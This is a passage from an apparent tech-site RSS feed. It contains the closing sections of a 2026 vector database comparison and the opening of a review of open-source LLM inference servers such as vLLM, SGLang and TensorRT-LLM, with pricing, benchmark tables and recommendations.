<p>Pgvector's performance at large vector counts (50M+) at high QPS trails purpose-built engines. It's not designed for billion-scale vector workloads. But most RAG applications don't have billion-scale vector workloads. They have a few million documents, moderate query rates, and a team that already knows how to operate Postgres. For that profile, pgvector is often the correct answer.</p>
<p>The <code>pgvecto.rs</code> extension from TensorChord is worth knowing as an alternative - it's written in Rust and shows better performance at scale than the original C implementation, with the same SQL API.</p>
<p><strong>Hybrid search:</strong> Combine with <code>pg_search</code> (Apache-2.0, by ParadeDB) for BM25 full-text search in the same Postgres instance.</p>
<hr>
<h2 id="redis-vector-search---best-for-low-latency-requirements">Redis Vector Search - Best for Low-Latency Requirements</h2>
<p>Redis 8.4 (released early 2026) introduced <code>FT.HYBRID</code>, a unified command that fuses full-text BM25 and vector similarity results within a single execution plan. Previous versions required merging results at the application layer. This is a genuine improvement for hybrid search use cases.</p>
<p>Redis Cloud pricing: a permanent free tier with 30MB (not useful for production), Essentials from $0.007/hour (<del>$5/month), and Pro from $0.014/hour (</del>$200/month minimum). Pro adds dedicated resources, active-active replication, and 99.999% uptime.</p>
<p>The architectural advantage of Redis for vector search is sub-millisecond latency for hot data. Everything lives in RAM. For real-time RAG where you're serving cached context to high-traffic endpoints, Redis can hit latencies that dedicated vector databases can't match.</p>
<p>The trade-off: RAM is expensive. At $2+/GB for in-memory storage versus $0.07/GB for object storage (Turbopuffer's model), the economics diverge quickly at scale. Redis benchmarks at 3.4x higher QPS than Qdrant in Redis's own testing - but at lower recall thresholds. At matched recall rates, the gap narrows considerably.</p>
<p><img src="/images/tools/best-ai-vector-databases-2026-storage.jpg" alt="Physical hard drives representing the storage layer underlying vector database technology">
<em>Vector databases differ most in how they manage the index structures above the storage layer - HNSW, IVF, and LSM-based approaches each make different trade-offs between memory usage, query latency, and update throughput.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="lancedb---best-for-multi-modal-and-columnar-workloads">LanceDB - Best for Multi-Modal and Columnar Workloads</h2>
<p>LanceDB is built on the Lance columnar format and is architecturally different from most alternatives in this list. It handles larger-than-memory datasets gracefully because data lives on disk in a columnar format, not in RAM. That makes it well-suited for multi-modal RAG (text, images, audio, video in the same index) and for workloads where the vector corpus is too large to fit in memory but query latency doesn't need to be sub-millisecond.</p>
<p>LanceDB OSS is free and embedded - it runs inside your Python application process with no separate server. LanceDB Cloud is in public beta with usage-based pricing and $100 in free credits. The cloud offering adds automatic versioning, managed infrastructure, and SQL query support across the managed dataset.</p>
<p>Zero-copy versioning (automatic, no extra infrastructure) is a useful feature for ML workflows where you want to roll back to previous dataset snapshots.</p>
<p><strong>Integrations:</strong> LangChain, LlamaIndex.</p>
<hr>
<h2 id="turbopuffer---best-cost-efficiency-at-scale">Turbopuffer - Best Cost Efficiency at Scale</h2>
<p>Turbopuffer is the most architecturally interesting entry in this list. It builds vector search on object storage (S3) as the primary data layer, with a memory and SSD cache sitting in front. The cost difference is significant: incumbents using RAM + 3x SSD for index storage pay roughly $1,600/TB/month; Turbopuffer's S3 + SSD cache model runs $70/TB/month.</p>
<p>This is why Cursor, Anthropic, Notion, Linear, and Superhuman use it. A Cursor co-founder noted they saved &quot;an order of magnitude in costs&quot; after switching their vector database to Turbopuffer.</p>
<p>At the production scale it's operating at - 3.5T+ documents, 10M+ writes/second, 25k+ queries/second - the architecture clearly works.</p>
<p>The trade-off is cold-query latency. When data isn't in the SSD cache, query times are 285-444ms p90. For workloads with uniform query distribution across a large corpus, that's fine. For workloads where cache hit rate is high, warm performance is 10-18ms p90. If your use case has a long tail of infrequently accessed namespaces, cold-cache latency is a real concern.</p>
<p>Pricing: $64/month minimum spend. No free tier.</p>
<p><strong>Hybrid search:</strong> Supported (vector + full-text).</p>
<hr>
<h2 id="elastic-vector-search--opensearch-k-nn">Elastic Vector Search / OpenSearch k-NN</h2>
<p>Both are solid choices when you already run an Elasticsearch or OpenSearch cluster for full-text search and want to add vector capabilities without a new dependency. The integration is natural - vector search and BM25 keyword search run on the same infrastructure, and hybrid search via reciprocal rank fusion works well.</p>
<p>OpenSearch 2.11+ supports hybrid search combining BM25 and vector similarity. Amazon OpenSearch Service pricing is cluster-based (instance hours + storage); dedicated master nodes and data nodes are billed separately, making cost estimation more involved than purpose-built vector databases. AWS also introduced Amazon S3 Vectors in 2026, promising up to 90% lower costs for vector storage in the S3 ecosystem.</p>
<p>Elasticsearch (via Elastic) shows strong performance in filtered vector search benchmarks, though its own comparison against OpenSearch shows Elasticsearch with 60% higher throughput for filtered queries in their testing.</p>
<p>The honest use case: if your team runs Elastic or OpenSearch at scale and you need to add semantic search, don't introduce a separate vector database. If you're starting fresh specifically for vector search, purpose-built options generally offer better QPS/cost at the same recall level.</p>
<hr>
<h2 id="mongodb-atlas-vector-search---best-for-existing-atlas-users">MongoDB Atlas Vector Search - Best for Existing Atlas Users</h2>
<p>Atlas Vector Search is included in your Atlas cluster - it's not a separate product. If you run MongoDB already, semantic search over your documents costs no gradual infrastructure. The free tier (M0) includes Vector Search and gives you 512MB storage. The Flex tier scales to 5GB with pay-as-you-go billing capped at roughly $30/month.</p>
<p>The limitation: vector search performance is constrained by your Atlas cluster size. It runs on the same compute as your operational workload, which means a burst of vector queries can affect your transactional performance if you haven't provisioned dedicated search nodes. Atlas does support dedicated Search Nodes (separate compute for search operations) from the M10 tier, which adds cost but isolates the workload.</p>
<p>For teams running MongoDB as their primary database and adding AI features, Atlas Vector Search removes a deployment dependency. For teams building a greenfield vector search system, the pricing model (cluster-based, not vector-optimized) is harder to predict at scale.</p>
<hr>
<h2 id="singlestore---best-for-real-time-analytics--vector-hybrid">SingleStore - Best for Real-Time Analytics + Vector Hybrid</h2>
<p>SingleStore is a distributed SQL database that added HNSW-indexed ANN vector search with a full product quantization implementation. The pitch is different from every other option on this list: you get vector search, full-text search, and high-performance SQL analytics in one system with no data movement between services.</p>
<p>Hybrid filtering in SingleStore uses standard SQL WHERE clauses, JOINs, and aggregations combined with the vector similarity search. There's no separate query language to learn. For applications that need to combine vector similarity with time-series analytics or relational filtering, that consolidation reduces the number of moving parts considerably.</p>
<p>The CEO has publicly argued that purpose-built vector databases will struggle long-term as general-purpose databases with strong vector support become the norm. That's a self-serving position, but it's worth taking seriously at the architecture planning stage.</p>
<p>Pricing is custom (contact sales). A free shared tier exists for evaluation.</p>
<hr>
<h2 id="vectordbbench-performance-summary">VectorDBBench Performance Summary</h2>
<p>The table below reflects VectorDBBench results at 1M vectors (768 dimensions, HNSW index) where available. Numbers vary by configuration and hardware - treat these as directional, not definitive.</p>
<table>
  <thead>
      <tr>
          <th>Database</th>
          <th>Approximate QPS (1M vec)</th>
          <th>Recall@10</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Qdrant</td>
          <td>~1,200</td>
          <td>~99%</td>
          <td>Per Qdrant's own benchmarks</td>
      </tr>
      <tr>
          <td>Milvus</td>
          <td>~900-1,100</td>
          <td>~98%</td>
          <td>Fastest index build time</td>
      </tr>
      <tr>
          <td>Weaviate</td>
          <td>~600-800</td>
          <td>~97%</td>
          <td>Per Qdrant benchmark suite</td>
      </tr>
      <tr>
          <td>Redis</td>
          <td>~1,500+</td>
          <td>~95%</td>
          <td>At lower recall threshold</td>
      </tr>
      <tr>
          <td>pgvector (HNSW)</td>
          <td>~200-400</td>
          <td>~97%</td>
          <td>Depends heavily on Postgres config</td>
      </tr>
      <tr>
          <td>Elasticsearch</td>
          <td>~500-700</td>
          <td>~99%</td>
          <td>10x slower at 10M 96-dim vectors</td>
      </tr>
      <tr>
          <td>Turbopuffer</td>
          <td>~25k total (warm)</td>
          <td>N/A</td>
          <td>Shared infra, warm-cache p90 10ms</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="best-pick-recommendations">Best Pick Recommendations</h2>
<p><strong>Start here for new projects:</strong> If you don't have an existing database that supports vectors and your corpus is under 50M documents, Qdrant cloud is the cleanest starting point. Free cluster, Apache 2.0 open-source, strong filtering, no per-query pricing.</p>
<p><strong>Existing Postgres users:</strong> Add pgvector. The operational simplicity of keeping everything in one system outweighs the performance gap until you're running 50M+ vectors at high QPS.</p>
<p><strong>Enterprise managed cloud:</strong> Weaviate Dedicated or Zilliz Cloud both handle production scale. Weaviate is better if hybrid search quality is critical; Zilliz Cloud is better if you need very high write throughput and billion-scale vector counts.</p>
<p><strong>Cost-sensitive at scale:</strong> Turbopuffer. The S3-native architecture is 10-23x cheaper per TB than RAM-heavy alternatives, and the production track record at Cursor, Notion, and Linear gives it credibility that a newer entrant normally doesn't have.</p>
<p><strong>Already on MongoDB/Elastic/Redis:</strong> Don't add infrastructure. Use the vector search capability built into what you already operate. The marginal performance gain from switching to a purpose-built database rarely justifies the operational cost of adding a new service.</p>
<p>For selecting the right embedding model to pair with any of these databases, the <a href="/leaderboards/rag-benchmarks-leaderboard/">RAG benchmarks leaderboard</a> tracks quality metrics across the full retrieval pipeline.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-vector-database-has-the-best-hybrid-search-in-2026">Which vector database has the best hybrid search in 2026?</h3>
<p>Weaviate has the most mature native hybrid search, fusing BM25 and dense vectors in a single query call. Redis 8.4's FT.HYBRID command is now comparable for in-memory workloads. Qdrant and Milvus both support sparse + dense vector hybrid search.</p>
<h3 id="is-pgvector-good-enough-for-production-rag">Is pgvector good enough for production RAG?</h3>
<p>For most RAG workloads under 20M vectors with moderate query rates, yes. It's not the highest-performance option, but it removes an infrastructure dependency and uses SQL for filtering. Above 50M vectors or at high concurrent QPS, purpose-built databases pull ahead.</p>
<h3 id="how-does-turbopuffer-compare-to-pinecone-on-cost">How does Turbopuffer compare to Pinecone on cost?</h3>
<p>At scale, Turbopuffer is significantly cheaper. Turbopuffer's S3-first storage runs $70/TB/month vs. RAM-heavy alternatives at $1,600/TB/month. Pinecone's read unit pricing becomes expensive when namespace sizes are large and query volumes are high.</p>
<h3 id="whats-the-difference-between-milvus-and-zilliz-cloud">What's the difference between Milvus and Zilliz Cloud?</h3>
<p>Milvus is the Apache 2.0 open-source project you self-host. Zilliz Cloud is the fully managed SaaS version built and operated by the Milvus creators (Zilliz Inc), with additional cloud-specific optimizations and enterprise support.</p>
<h3 id="do-i-need-a-dedicated-vector-database-or-can-i-use-mongodbpostgres">Do I need a dedicated vector database or can I use MongoDB/Postgres?</h3>
<p>It depends on scale and team capacity. For most applications adding AI features to an existing MongoDB or Postgres deployment, the built-in vector search is sufficient and avoids operational overhead. Dedicated vector databases offer better performance at large scale but add another system to operate.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.pinecone.io/pricing/">Pinecone Pricing</a> - Official Pinecone pricing page</li>
<li><a href="https://qdrant.tech/pricing/">Qdrant Pricing</a> - Official Qdrant cloud pricing</li>
<li><a href="https://qdrant.tech/benchmarks/">Qdrant Benchmarks</a> - Open-source vector database benchmark suite</li>
<li><a href="https://weaviate.io/pricing">Weaviate Pricing</a> - Official Weaviate Cloud pricing (updated Oct 2025)</li>
<li><a href="https://zilliz.com/pricing">Zilliz Cloud Pricing</a> - Official Zilliz Cloud pricing</li>
<li><a href="https://turbopuffer.com/blog/turbopuffer">Turbopuffer Architecture</a> - Turbopuffer blog: architecture and performance details</li>
<li><a href="https://redis.io/blog/benchmarking-results-for-vector-databases/">Redis Benchmarking Results</a> - Redis vector database benchmark blog post</li>
<li><a href="https://redis.io/blog/revamping-context-oriented-retrieval-with-hybrid-search-in-redis-84/">Redis 8.4 Hybrid Search</a> - Redis FT.HYBRID announcement</li>
<li><a href="https://github.com/zilliztech/VectorDBBench">VectorDBBench</a> - Open-source benchmark tool (Zilliz / Milvus team)</li>
<li><a href="https://ranksquire.com/2026/03/04/vector-database-pricing-comparison-2026/">Ranksquire Pricing Comparison 2026</a> - Third-party TCO breakdown</li>
<li><a href="https://zilliz.com/blog/zilliz-cloud-oct-2025-update">Zilliz Oct 2025 Update</a> - Tiered storage and pricing changes</li>
<li><a href="https://www.mongodb.com/products/platform/atlas-vector-search">MongoDB Atlas Vector Search</a> - Official MongoDB Atlas Vector Search product page</li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-vector-databases-2026_hu_3ca0356f411f89ce.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-vector-databases-2026_hu_3ca0356f411f89ce.jpg" width="1200" height="675"/></item><item><title>Best Open-Source LLM Inference Servers 2026</title><link>https://awesomeagents.ai/tools/best-open-source-llm-inference-servers-2026/</link><pubDate>Fri, 17 Apr 2026 14:03:34 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-open-source-llm-inference-servers-2026/</guid><description>&lt;p>Picking a LLM inference server used to be easy. You had vLLM, you had TGI, and you picked based on whether you wanted throughput or HuggingFace integration. That decision tree is now a lot more complicated. SGLang has closed the gap - and in many workloads surpassed - vLLM on raw throughput. TGI quietly entered maintenance mode in December 2025. TensorRT-LLM keeps posting the fastest absolute numbers if you can tolerate a 28-minute compilation step per model. LMDeploy, Aphrodite, and MLC-LLM have carved out real niches. And Ray Serve has grown into a full orchestration layer that sits above all of them.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Picking a LLM inference server used to be easy. You had vLLM, you had TGI, and you picked based on whether you wanted throughput or HuggingFace integration. That decision tree is now a lot more complicated. SGLang has closed the gap - and in many workloads surpassed - vLLM on raw throughput. TGI quietly entered maintenance mode in December 2025. TensorRT-LLM keeps posting the fastest absolute numbers if you can tolerate a 28-minute compilation step per model. LMDeploy, Aphrodite, and MLC-LLM have carved out real niches. And Ray Serve has grown into a full orchestration layer that sits above all of them.</p>
<p>This comparison covers eleven frameworks, pulls from H100 benchmarks published in early 2026, and tries to give you an honest decision framework rather than another feature-checkbox table.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>vLLM</strong> is the safest default for new production deployments: 200+ model architectures, active development, Apache 2.0, OpenAI-compatible API out of the box</li>
<li><strong>SGLang</strong> is the throughput leader for workloads with shared prefixes (RAG, multi-turn chat) - roughly 29% faster than vLLM on H100 for Llama 3.1 8B</li>
<li><strong>TensorRT-LLM</strong> posts the best raw numbers but requires 28-minute engine compilation per model - only justified for sustained high-traffic serving of a fixed model</li>
<li><strong>llama.cpp / Ollama</strong> are the right choice for development, CPU-only inference, or low-concurrency internal tooling - not for customer-facing scale</li>
<li><strong>TGI is in maintenance mode</strong> - migrate to vLLM or SGLang for anything new</li>
</ul>
</div>
<h2 id="the-benchmark-baseline">The Benchmark Baseline</h2>
<p>All throughput numbers below come from public H100 SXM5 80GB benchmarks running Meta-Llama 3.3-70B-Instruct in FP8 precision unless noted otherwise. For smaller models (Llama 3.1 8B on H100), the SGLang/LMDeploy lead is wider (roughly 16,200 tok/s vs 12,500 tok/s for vLLM).</p>
<table>
  <thead>
      <tr>
          <th>Server</th>
          <th>Throughput @100 req (tok/s)</th>
          <th>TTFT p50/p95 @100 req (ms)</th>
          <th>Cold Start</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>TensorRT-LLM v1.2</td>
          <td>2,780</td>
          <td>680 / 1,280</td>
          <td>~28 min (compile)</td>
      </tr>
      <tr>
          <td>SGLang v0.5.9</td>
          <td>2,460</td>
          <td>710 / 1,380</td>
          <td>~58 sec</td>
      </tr>
      <tr>
          <td>vLLM v0.18.0</td>
          <td>2,400</td>
          <td>740 / 1,450</td>
          <td>~62 sec</td>
      </tr>
      <tr>
          <td>LMDeploy (Int4, A100)</td>
          <td>700</td>
          <td>lowest tested</td>
          <td>~45 sec</td>
      </tr>
      <tr>
          <td>llama.cpp / Ollama</td>
          <td>~155 @50 conc.</td>
          <td>high variance</td>
          <td>~5 sec</td>
      </tr>
  </tbody>
</table>
<p><em>Hardware: NVIDIA H100 SXM5 80GB (single GPU) for TRT/SGLang/vLLM rows. LMDeploy row: A100 80GB, Llama 3 70B Int4, 100 concurrent users. Ollama row: RTX 4090. Sources: <a href="https://www.spheron.network/blog/vllm-vs-tensorrt-llm-vs-sglang-benchmarks/">Spheron benchmarks</a>, <a href="https://blog.premai.io/vllm-vs-sglang-vs-lmdeploy-fastest-llm-inference-engine-in-2026/">Prem AI comparison</a>.</em></p>
<p><img src="/images/tools/best-open-source-llm-inference-servers-2026-gpu-cluster.jpg" alt="GPU cluster powering LLM inference">
<em>Modern GPU clusters run multiple inference servers simultaneously, making the choice of serving framework a critical infrastructure decision.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="vllm---the-reliable-default">vLLM - The Reliable Default</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/vllm-project/vllm">vllm-project/vllm</a> | <strong>License</strong>: Apache 2.0 | <strong>Latest</strong>: v0.19.0 (Apr 3, 2026)</p>
<p>vLLM started at UC Berkeley and has built up 77k GitHub stars and 2,000+ contributors. It remains the reference implementation for PagedAttention - a KV cache management technique that treats GPU memory like virtual memory, partitioning the cache into fixed-size blocks that can live in non-contiguous memory. The result is less than 4% memory waste under typical workloads, compared to 60-80% fragmentation in naive implementations.</p>
<h3 id="strengths">Strengths</h3>
<ul>
<li><strong>Model breadth</strong>: 200+ architectures natively supported from HuggingFace, including decoder-only LLMs, MoE models (DeepSeek-V3, Mixtral), multimodal models (LLaVA, Qwen-VL), and embedding models</li>
<li><strong>Quantization coverage</strong>: FP8, INT4, INT8, GPTQ, AWQ, GGUF, and compressed_tensors - essentially everything</li>
<li><strong>Hardware portability</strong>: NVIDIA GPUs, AMD GPUs, CPUs, TPUs, and specialized accelerators</li>
<li><strong>Speculative decoding</strong>: n-gram, suffix, EAGLE, and DFlash variants supported</li>
<li><strong>API compatibility</strong>: OpenAI-compatible server plus Anthropic Messages API</li>
</ul>
<h3 id="weaknesses">Weaknesses</h3>
<ul>
<li>Cold start around 62 seconds - not ideal for auto-scaling fleets</li>
<li>TTFT p99 is 80% larger than competitors under load in some benchmarks - variance is higher than SGLang</li>
<li>Slightly behind SGLang and TRT-LLM on raw throughput for larger models</li>
</ul>
<h3 id="best-for">Best for</h3>
<p>General-purpose production serving where you need to run multiple model architectures and don't want to maintain separate serving stacks. The ecosystem around vLLM (observability tools, integrations, community support) is unmatched.</p>
<hr>
<h2 id="sglang---the-throughput-leader">SGLang - The Throughput Leader</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/sgl-project/sglang">sgl-project/sglang</a> | <strong>License</strong>: Apache 2.0 | <strong>Latest</strong>: v0.5.10.post1 (Apr 9, 2026)</p>
<p>SGLang is the inference engine that crept up on vLLM's market share by solving a specific problem better: prefix reuse. RadixAttention uses a radix tree data structure to automatically identify and cache shared KV blocks across requests. When multiple users start with the same system prompt, the same document in a RAG pipeline, or the same few-shot examples, those tokens are computed once and reused.</p>
<p>The cache hit rates are dramatic: 85-95% for few-shot workloads vs 15-25% for vLLM's prefix caching, and 75-90% for multi-turn chat vs 10-20% for vLLM. That compounding reuse is why SGLang delivers 3.1x faster inference than vLLM on DeepSeek V3 specifically.</p>
<h3 id="strengths-1">Strengths</h3>
<ul>
<li><strong>Structured output</strong>: xGrammar backend delivers up to 10x faster JSON decoding than alternatives, with compiled grammars cached in the radix tree for reuse</li>
<li><strong>Scale</strong>: Powers 400,000+ GPUs globally, trillions of tokens daily. Production users include xAI, AMD, NVIDIA, LinkedIn, and Cursor</li>
<li><strong>Multi-GPU</strong>: Tensor, pipeline, expert, and data parallelism</li>
<li><strong>Quantization</strong>: FP4/FP8/INT4/AWQ/GPTQ across NVIDIA GB200/B300/H100 and AMD MI-series</li>
<li><strong>Prefill-decode disaggregation</strong>: Separates the prompt processing phase from token generation for better resource use</li>
</ul>
<h3 id="weaknesses-1">Weaknesses</h3>
<ul>
<li>Smaller community than vLLM (26k stars vs 77k)</li>
<li>Slightly steeper operational learning curve</li>
<li>Fewer supported model architectures than vLLM</li>
</ul>
<h3 id="best-for-1">Best for</h3>
<p>Any workload with shared prefixes: RAG pipelines, document Q&amp;A, multi-turn chat agents, structured JSON extraction. For anything involving <a href="/tools/best-ai-agent-frameworks-2026">AI agent frameworks</a>, SGLang's prefix caching compounds into a significant cost advantage.</p>
<hr>
<h2 id="tensorrt-llm---maximum-performance-maximum-friction">TensorRT-LLM - Maximum Performance, Maximum Friction</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/NVIDIA/TensorRT-LLM">NVIDIA/TensorRT-LLM</a> | <strong>License</strong>: Apache 2.0 | <strong>Latest</strong>: v1.2.0</p>
<p>NVIDIA TensorRT-LLM is the performance ceiling for LLM serving on NVIDIA hardware. The numbers are real: 13% higher throughput than vLLM at 50 concurrent requests, best TTFT across every concurrency level. On H100 and later GPUs, FP8 quantization doubles performance versus FP16. On B200 GPUs, FP4 inference is natively supported.</p>
<p>The cost is compilation. Every new model requires building a TensorRT engine, a process that takes around 28 minutes. After that first compile, subsequent warm starts drop to ~90 seconds. But any model update, weight change, or configuration tweak triggers a full recompile.</p>
<h3 id="strengths-2">Strengths</h3>
<ul>
<li>Highest throughput and lowest TTFT in class at high concurrency</li>
<li>In-flight batching maximizes GPU use</li>
<li>FlashAttention and paged KV caching built in</li>
<li>Best-in-class on NVIDIA hardware including GB200 (FP4 native)</li>
<li>Usually rolled out through the Triton Inference Server backend</li>
</ul>
<h3 id="weaknesses-2">Weaknesses</h3>
<ul>
<li>28-minute engine compilation per model - painful for experimentation</li>
<li>NVIDIA-only (no AMD, no CPU, no TPU fallback)</li>
<li>The &quot;open source&quot; label is technically accurate (Apache 2.0) but NVIDIA controls development and the custom kernels make portability a non-starter</li>
</ul>
<h3 id="best-for-2">Best for</h3>
<p>High-volume production deployments where you're running a fixed model at scale and can amortize the compilation overhead. Data centers serving millions of requests per day on H100/B200 fleets. Not recommended if you need to swap models frequently or experiment with architectures.</p>
<hr>
<h2 id="huggingface-tgi---sunsetted">HuggingFace TGI - Sunsetted</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/huggingface/text-generation-inference">huggingface/text-generation-inference</a> | <strong>Status</strong>: Maintenance mode since Dec 11, 2025</p>
<p>TGI pioneered the OpenAI-compatible API wrapper for HuggingFace models and was the default choice for most teams from 2023 through 2025. On December 11, 2025, HuggingFace's Lysandre Debut announced that TGI had entered maintenance mode - only minor bug fixes and documentation updates will be accepted. New features are done.</p>
<p>Under production load, TGI achieved 68-74% GPU use compared to vLLM's 85-92%, and saturated at 50-75 concurrent requests vs vLLM's 100-150. For existing deployments, TGI will continue working. For anything new, migrate.</p>
<p><strong>Migration path</strong>: Drop-in replacement is vLLM or SGLang - both serve the same OpenAI-compatible <code>/v1/chat/completions</code> endpoint.</p>
<hr>
<h2 id="llamacpp-and-ollama---development-tools">llama.cpp and Ollama - Development Tools</h2>
<p><strong>llama.cpp GitHub</strong>: <a href="https://github.com/ggml-org/llama.cpp">ggml-org/llama.cpp</a> | <strong>License</strong>: MIT</p>
<p>llama.cpp runs LLM inference in pure C++ with no GPU required. It supports GGUF quantization from 1.5-bit through 8-bit integer, k-quants (Q4_K_M, Q5_K_S, etc.), and KV cache quantization that cuts memory usage by up to 50% during generation. The built-in <code>llama-server</code> exposes an OpenAI-compatible API with Prometheus metrics, and since late 2025 also supports the Anthropic Messages API.</p>
<p>Ollama wraps llama.cpp in a user-friendly CLI and REST interface, adding model management and a clean API. It's excellent for local development, testing prompt changes, and internal tooling.</p>
<p>The production ceiling is real: at 50 concurrent users, Ollama plateaus at roughly 155 tok/s while vLLM maintains 920 tok/s. Response times degrade from 2 seconds to 45+ seconds with just 10 concurrent users. This isn't a criticism - these tools are optimized for a different use case. See our separate <a href="/tools/best-local-llm-tools-2026">local LLM tools comparison</a> for the desktop-first perspective.</p>
<h3 id="best-for-3">Best for</h3>
<p>CPU-only inference, air-gapped environments, developer workstations, model prototyping before launching to a GPU cluster.</p>
<hr>
<h2 id="lmdeploy---the-hidden-strong-contender">LMDeploy - The Hidden Strong Contender</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/InternLM/lmdeploy">InternLM/lmdeploy</a> | <strong>License</strong>: Apache 2.0</p>
<p>LMDeploy from the InternLM team runs the TurboMind inference engine (C++) and matches SGLang's throughput on Llama 3.1 8B (~16,100 tok/s on H100). Its standout metric is latency on quantized models: for Int4 inference on A100 80GB running Llama 3 70B at 100 concurrent users, LMDeploy delivers 700 tok/s with the lowest time-to-first-token across all tested engines. The Int4 performance is 2.4x faster than FP16.</p>
<p>LMDeploy supports persistent batch inference, blocked KV cache, dynamic split-and-fuse, and tensor parallelism. The caveat is narrower model coverage than vLLM and a smaller Western community - most documentation and issues are in Chinese.</p>
<h3 id="best-for-4">Best for</h3>
<p>Teams running InternLM models, or anyone prioritizing Int4 latency on A100/A800 hardware.</p>
<hr>
<h2 id="mlc-llm---cross-platform-compilation">MLC-LLM - Cross-Platform Compilation</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/mlc-ai/mlc-llm">mlc-ai/mlc-llm</a> | <strong>License</strong>: Apache 2.0</p>
<p>MLC-LLM compiles models via Apache TVM to run on CUDA, Vulkan, Metal, and WebGPU. The same compiled artifact runs on Linux, macOS, Windows, iOS, Android, and in-browser via WebGPU. This is the only framework in this list that can serve a model natively on a mobile device or in a browser.</p>
<p>For server-side production throughput, MLC-LLM is not competitive with vLLM or SGLang. Its value is in edge and cross-platform deployment where the runtime can't be NVIDIA-only. It exposes an OpenAI-compatible REST API and supports FP8/INT4/AWQ/GPTQ quantization.</p>
<h3 id="best-for-5">Best for</h3>
<p>Edge inference, mobile deployment, browser-based private AI applications, cross-platform CI/CD pipelines.</p>
<hr>
<h2 id="aphrodite-engine---extended-quantization-for-creative-ai">Aphrodite Engine - Extended Quantization for Creative AI</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/aphrodite-engine/aphrodite-engine">aphrodite-engine/aphrodite-engine</a> | <strong>License</strong>: AGPL-3.0</p>
<p>Aphrodite is a vLLM fork maintained by the PygmalionAI team, tuned for creative writing and roleplay use cases. Its unique value is quantization breadth: AQLM, AutoRound, AWQ, BitNet, Bitsandbytes, EETQ, GGUF, GPTQ, QuIP#, SqueezeLLM, Marlin, FP2 through FP12, NVIDIA ModelOpt, TorchAO, VPTQ, and MXFP4. It also adds a KoboldAI-compatible API layer and Mirostat sampling.</p>
<p>For general production serving, stick with upstream vLLM - Aphrodite's advantages are niche. But if you need FP2 quantization or KoboldAI API compatibility, it's the only serious option.</p>
<hr>
<h2 id="deepspeed-mii---microsofts-inference-layer">DeepSpeed-MII - Microsoft's Inference Layer</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/deepspeedai/DeepSpeed-MII">deepspeedai/DeepSpeed-MII</a> | <strong>License</strong>: Apache 2.0</p>
<p>DeepSpeed-MII provides inference optimizations from Microsoft Research: blocked KV caching, continuous batching, Dynamic SplitFuse, tensor parallelism, and INT8/ZeroQuant quantization. It supports 37,000+ models and claims up to 2.5x higher throughput than vLLM in its own benchmarks.</p>
<p>The honest assessment: MII's benchmarks predate vLLM's v0.6+ performance improvements, and independent 2026 comparisons show it behind SGLang and current vLLM. It remains relevant for teams already on the Azure/DeepSpeed stack. For greenfield deployments, vLLM or SGLang is the better default.</p>
<hr>
<h2 id="triton-inference-server---the-enterprise-orchestration-layer">Triton Inference Server - The Enterprise Orchestration Layer</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/triton-inference-server/server">triton-inference-server/server</a> | <strong>License</strong>: BSD 3-Clause</p>
<p>NVIDIA Triton is general-purpose multi-framework model serving, not a LLM inference engine itself. Its value in this comparison is as the production deployment layer on top of TensorRT-LLM. The TensorRT-LLM backend for Triton adds in-flight batching, paged attention, LoRA support, and leader/orchestrator multi-GPU modes.</p>
<p>Triton handles the enterprise concerns: multi-model serving, health checks, performance metrics, ensemble pipelines, and gRPC/HTTP APIs. If your production stack already uses Triton for computer vision or NLP models, adding LLM serving via the TRT-LLM backend is the natural path.</p>
<p><img src="/images/tools/best-open-source-llm-inference-servers-2026-network.jpg" alt="Network infrastructure powering distributed LLM serving">
<em>Multi-GPU inference deployments rely on high-bandwidth networking between nodes - the infrastructure layer matters as much as the serving framework.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="ray-serve---orchestration-not-a-server">Ray Serve - Orchestration, Not a Server</h2>
<p><strong>Docs</strong>: <a href="https://docs.ray.io/en/latest/serve/llm/index.html">docs.ray.io/en/latest/serve/llm/index.html</a> | <strong>License</strong>: Apache 2.0</p>
<p>Ray Serve isn't an inference engine - it's a programmable orchestration layer that wraps engines like vLLM. The ray-llm repository was archived for the built-in <code>ray.serve.llm</code> API (available since Ray 2.44), which handles auto-scaling, load balancing, streaming responses, and multi-model routing.</p>
<p>Ray Serve's superpower is disaggregated serving: prefill and decode phases can be separated across different actor pools, tuning GPU use. Teams serving multiple models or needing fine-grained traffic control will find it valuable. Teams serving a single model with predictable load should just run vLLM directly.</p>
<hr>
<h2 id="full-comparison-table">Full Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Server</th>
          <th>License</th>
          <th>OpenAI API</th>
          <th>Multi-GPU</th>
          <th>Quantization</th>
          <th>Spec. Decode</th>
          <th>Prefix Cache</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>vLLM</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP + PP</td>
          <td>FP8, AWQ, GPTQ, GGUF, INT4/8</td>
          <td>Yes (EAGLE, n-gram)</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>SGLang</td>
          <td>Apache 2.0</td>
          <td>Yes</td>
          <td>TP + PP + EP</td>
          <td>FP4/FP8/INT4/AWQ/GPTQ</td>
          <td>Yes</td>
          <td>Yes (RadixAttention)</td>
      </tr>
      <tr>
